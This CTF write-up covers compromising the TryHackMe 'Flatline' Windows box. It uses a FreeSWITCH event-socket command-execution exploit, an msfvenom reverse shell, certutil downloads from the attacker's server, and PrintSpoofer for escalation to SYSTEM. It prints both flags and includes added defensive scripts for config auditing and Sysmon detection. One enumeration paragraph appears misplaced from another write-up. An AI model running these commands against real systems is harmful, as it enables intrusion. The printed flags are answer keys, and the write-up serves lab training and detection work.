
How low are your morals?
| Title | Flatline |
|---|---|
| Description | How low are your morals? |
| Points | 60 |
| Difficulty | Easy |
| Maker | Nekrotic |
Summary
Flatline: in this machine we exploit the FreeSWITCH service running on the box, which allows RCE. From there we get our shell and escalate our privileges using the classic PrintSpoofer; there are also other ways to escalate, like simply granting yourself permission to read the root.txt flag.
Enumeration
After trying a random user and password from the list we got, the error says: Invalid username, and after a certain number of attempts we start getting captchas to solve, so we automate the process using Python:
```
└─$ nmap -p$ports -sC -sV -Pn -n 10.10.162.76
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-04 10:17 UTC
Nmap scan report for 10.10.162.76
Host is up (0.25s latency).

PORT     STATE SERVICE          VERSION
3389/tcp open  ms-wbt-server    Microsoft Terminal Services
| ssl-cert: Subject: commonName=WIN-EOM4PK0578N
| Not valid before: 2025-07-03T10:09:04
|_Not valid after:  2026-01-02T10:09:04
|_ssl-date: 2025-07-04T10:18:07+00:00; -2s from scanner time.
| rdp-ntlm-info:
|   Target_Name: WIN-EOM4PK0578N
|   NetBIOS_Domain_Name: WIN-EOM4PK0578N
|   NetBIOS_Computer_Name: WIN-EOM4PK0578N
|   DNS_Domain_Name: WIN-EOM4PK0578N
|   DNS_Computer_Name: WIN-EOM4PK0578N
|   Product_Version: 10.0.17763
|_  System_Time: 2025-07-04T10:18:03+00:00
8021/tcp open  freeswitch-event FreeSWITCH mod_event_socket
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
```
Since we don't have credentials we can't use port 3389, so let's focus on port 8021 and see whether it is vulnerable to a known CVE:
```
┌──(azadin㉿kali)-[~/tryhackme]
└─$ searchsploit freeswitch
---------------------------------------------------------- ---------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------
FreeSWITCH - Event Socket Command Execution (Metasploit)  | multiple/remote/47698.rb
FreeSWITCH 1.10.1 - Command Execution                     | windows/remote/47799.txt
---------------------------------------------------------- ---------------------------
Shellcodes: No Results
```
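The root cause of this foothold is an event socket (mod_event_socket, port 8021) reachable from the network with weak authentication. The following audit script is an added example, not part of the writeup or of the FreeSWITCH project; it parses an `event_socket.conf.xml`, flags a non-loopback `listen-ip`, a default or short `password`, and a missing `apply-inbound-acl`, and shows a constructed weak config beside a hardened one. The shipped default password value is an assumption.

```python
"""Audit FreeSWITCH event_socket.conf.xml for the exposure used in this box."""
import xml.etree.ElementTree as ET

DEFAULT_PASSWORD = "ClueCon"          # assumed: password FreeSWITCH ships with
LOOPBACK = {"127.0.0.1", "::1"}

# Constructed weak config: listens on every interface with the shipped password
WEAK = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="::"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="ClueCon"/>
  </settings>
</configuration>"""

# Constructed hardened config: loopback only, unique password, inbound ACL
HARDENED = """<configuration name="event_socket.conf" description="Socket Client">
  <settings>
    <param name="listen-ip" value="127.0.0.1"/>
    <param name="listen-port" value="8021"/>
    <param name="password" value="k7Qw!m3zR9vL2pXs"/>
    <param name="apply-inbound-acl" value="loopback.auto"/>
  </settings>
</configuration>"""


def audit(xml_text):
    """Return a list of findings (empty list means nothing to fix)."""
    params = {p.get("name"): p.get("value", "")
              for p in ET.fromstring(xml_text).iter("param")}
    findings = []
    ip = params.get("listen-ip", "")
    if ip not in LOOPBACK:
        findings.append(f"listen-ip {ip!r} exposes the ESL port beyond localhost")
    pw = params.get("password", "")
    if pw == DEFAULT_PASSWORD or len(pw) < 12:
        findings.append("ESL password is the shipped default or too short")
    if "apply-inbound-acl" not in params:
        findings.append("no apply-inbound-acl: any host reaching the port may authenticate")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, "->", audit(cfg) or ["no findings"])
```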
Shell
We'll be using the second one.
```
┌──(azadin㉿kali)-[~/tryhackme]
└─$ python3 47799.txt 10.10.162.76 'whoami'
Authenticated
Content-Type: api/response
Content-Length: 94
```
We could probably root this machine just by executing commands from here, since our user is in the Administrators group, and to use the first port (RDP) we would only need to reset our password (this is the easy way to do things).
But this wasn't stable in my case, so I went a step further and used a reverse shell:
```
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.38.124 LPORT=4444 -f exe -o shell.exe
```
You first create the payload, then deliver it to the machine: start a simple Python HTTP server in the directory containing shell.exe and run:
```
┌──(azadin㉿kali)-[~/tryhackme]
└─$ python3 47799.txt 10.10.162.76 'certutil -urlcache -split -f http://10.9.2.77:8000/shell.exe'
Authenticated
Content-Type: api/response
Content-Length: 94

┌──(azadin㉿kali)-[~/tryhacke]
└─$ python3 47799.txt 10.10.162.76 'shell.exe'
Authenticated
Content-Type: api/response
Content-Length: 14
```
On another terminal you should start the listener on port 4444, or whichever port you chose before.
User Flag
```
C:\Users\Nekrotic\Desktop>more user.txt
more user.txt
THM{64bca0843d535fa73eecdc59d27cbe26}
```
Next, it would be easy to just reset the password for Nekrotic using net … and then connect through RDP on the first port if you prefer a GUI. In my case, let's just see what else can be done.
Root Flag
The root.txt is in the same directory as user.txt, but we don't have permission to read it.
```
C:\Users\Administrator>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== ========
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Disabled
SeSecurityPrivilege                       Manage auditing and security log                                   Disabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Disabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Disabled
SeSystemProfilePrivilege                  Profile system performance                                         Disabled
SeSystemtimePrivilege                     Change the system time                                             Disabled
SeProfileSingleProcessPrivilege           Profile single process                                             Disabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Disabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Disabled
SeBackupPrivilege                         Back up files and directories                                      Disabled
SeRestorePrivilege                        Restore files and directories                                      Disabled
SeShutdownPrivilege                       Shut down the system                                               Disabled
SeDebugPrivilege                          Debug programs                                                     Disabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Disabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeRemoteShutdownPrivilege                 Force shutdown from a remote system                                Disabled
SeUndockPrivilege                         Remove computer from docking station                               Disabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Disabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Disabled
SeTimeZonePrivilege                       Change the time zone                                               Disabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Disabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Disabled
```
SeImpersonatePrivilege: this one is a classic; whenever you see it, think of PrintSpoofer, a golden ticket to the Administrator account. I already had the binary, so I delivered it to the machine the same way we did with our reverse shell before, and next we become root:
```
C:\Users\Nekrotic\Desktop>certutil -urlcache -split -f http://10.9.2.77:8000/PrintSpoofer.exe
certutil -urlcache -split -f http://10.9.2.77:8000/PrintSpoofer.exe
****  Online  ****
  0000  ...
  6a00
CertUtil: -URLCache command completed successfully.

C:\Users\Nekrotic\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 84FD-2CC9

 Directory of C:\Users\Nekrotic\Desktop

04/07/2025  11:59    <DIR>          .
04/07/2025  11:59    <DIR>          ..
04/07/2025  11:59            27,136 PrintSpoofer.exe
09/11/2021  08:39                38 root.txt
09/11/2021  08:39                38 user.txt
               3 File(s)         27,212 bytes
               2 Dir(s)  50,056,843,264 bytes free

C:\Users\Nekrotic\Desktop>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Users\Nekrotic\Desktop>dir
 Directory of C:\Users\Nekrotic\Desktop

04/07/2025  11:59    <DIR>          .
04/07/2025  11:59    <DIR>          ..
04/07/2025  11:59            27,136 PrintSpoofer.exe
09/11/2021  08:39                38 root.txt
09/11/2021  08:39                38 user.txt
               3 File(s)         27,212 bytes
               2 Dir(s)  50,057,846,784 bytes free

C:\Users\Nekrotic\Desktop>more root.txt
more root.txt
THM{8c8bc5558f0f3f8060d00ca231a9fb5e}
```
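Every step of this chain leaves a process-creation trail: the certutil download used for both shell.exe and PrintSpoofer.exe, the shell spawned by the FreeSWITCH process itself, and a SYSTEM cmd.exe whose parent ran as Nekrotic from a user profile directory. The script below is an added example (not from the writeup) with three detection rules run over constructed Sysmon Event ID 1 style records; the field names follow Sysmon, the records themselves and the FreeSWITCH install path are assumptions.

```python
"""Process-creation detections for the certutil + PBX shell + PrintSpoofer chain."""
import re

SYSTEM = r"NT AUTHORITY\SYSTEM"
# LOLBin download: certutil -urlcache ... http(s)://
CERTUTIL_DL = re.compile(r"certutil(\.exe)?\s.*-urlcache\b.*\bhttps?://", re.IGNORECASE)
SHELLS = ("\\cmd.exe", "\\powershell.exe")

# Constructed Sysmon-style records mirroring the writeup's chain (install path
# of FreeSWITCH is assumed). The last record is benign certutil use.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -urlcache -split -f http://10.9.2.77:8000/shell.exe",
     "User": r"WIN-EOM4PK0578N\Nekrotic", "ParentUser": r"WIN-EOM4PK0578N\Nekrotic",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd /c whoami",
     "User": r"WIN-EOM4PK0578N\Nekrotic", "ParentUser": r"WIN-EOM4PK0578N\Nekrotic",
     "ParentImage": r"C:\Program Files\FreeSWITCH\freeswitch.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd",
     "User": SYSTEM, "ParentUser": r"WIN-EOM4PK0578N\Nekrotic",
     "ParentImage": r"C:\Users\Nekrotic\Desktop\PrintSpoofer.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": "certutil -hashfile setup.msi SHA256",
     "User": r"WIN-EOM4PK0578N\Nekrotic", "ParentUser": r"WIN-EOM4PK0578N\Nekrotic",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
]


def classify(ev):
    """Return the names of every rule this process-creation record trips."""
    hits = []
    image = ev.get("Image", "").lower()
    parent = ev.get("ParentImage", "").lower()
    if CERTUTIL_DL.search(ev.get("CommandLine", "")):
        hits.append("certutil-download")          # payload fetched via LOLBin
    if parent.endswith("freeswitch.exe") and image.endswith(SHELLS):
        hits.append("pbx-spawned-shell")          # PBX has no business running shells
    if (ev.get("User") == SYSTEM and ev.get("ParentUser") not in (None, SYSTEM)
            and parent.startswith("c:\\users\\")):
        hits.append("user-parent-system-child")   # token impersonation to SYSTEM
    return hits


def scan(events):
    """Map record index -> rule hits, keeping only records that tripped a rule."""
    return {i: h for i, ev in enumerate(events) if (h := classify(ev))}


if __name__ == "__main__":
    for i, hits in scan(EVENTS).items():
        print(i, EVENTS[i]["CommandLine"], "->", ", ".join(hits))
```

In production the third rule needs an allow-list for legitimate elevation paths (UAC consent, scheduled tasks), but a SYSTEM child of a binary under a user's Desktop is rarely benign.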